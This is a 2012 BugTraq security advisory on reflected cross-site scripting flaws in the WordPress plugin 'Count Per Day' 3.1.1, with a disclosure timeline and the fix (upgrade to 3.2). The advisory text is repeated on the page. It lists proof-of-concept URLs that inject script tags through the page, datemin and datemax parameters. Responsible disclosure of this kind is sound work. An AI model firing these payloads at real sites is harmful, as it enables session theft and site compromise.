BugTraq
Back to list
|
Post reply
WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities
Jul 16 2012 07:37AM
sschurtz darksecurity de
Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities
Advisory ID: SSCHADV2012-015
Author: Stefan Schurtz
Affected Software: Successfully tested on 'Count Per Day' 3.1.1
Vendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day
Vendor Status: fixed
==========================
Vulnerability Description
==========================
The WordPress plugin 'Count Per Day' 3.1.1' is prone to multiple XSS vulnerabilities
==================
PoC-Exploit
==================
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.p
hp?page="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.p
hp?page="/><script>alert(/xss/)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.p
hp?datemin="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.p
hp?datemin="/><script>alert(/xss/)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.p
hp?datemax="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.p
hp?datemax="/><script>alert(/xss/)</script>
=========
Solution
=========
Upgrade to the latest version 3.2
====================
Disclosure Timeline
====================
29-Jun-2012 - vendor informed (contact form)
02-Jul-2012 - verified by Meistar
03-Jul-2012 - feedback from developer
14-Jul-2012 - fixed by developer
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://wordpress.org/extend/plugins/count-per-day/changelog/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-015.txt
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Advisory ID: SSCHADV2012-015
Author: Stefan Schurtz
Affected Software: Successfully tested on 'Count Per Day' 3.1.1
Vendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day
Vendor Status: fixed
==========================
Vulnerability Description
==========================
The WordPress plugin 'Count Per Day' 3.1.1' is prone to multiple XSS vulnerabilities
==================
PoC-Exploit
==================
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.p
hp?page="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.p
hp?page="/><script>alert(/xss/)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.p
hp?datemin="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.p
hp?datemin="/><script>alert(/xss/)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.p
hp?datemax="/><script>alert(88)</script>
http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.p
hp?datemax="/><script>alert(/xss/)</script>
=========
Solution
=========
Upgrade to the latest version 3.2
====================
Disclosure Timeline
====================
29-Jun-2012 - vendor informed (contact form)
02-Jul-2012 - verified by Meistar
03-Jul-2012 - feedback from developer
14-Jul-2012 - fixed by developer
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://wordpress.org/extend/plugins/count-per-day/changelog/
http://www.darksecurity.de/advisories/2012/SSCHADV2012-015.txt
[ reply ]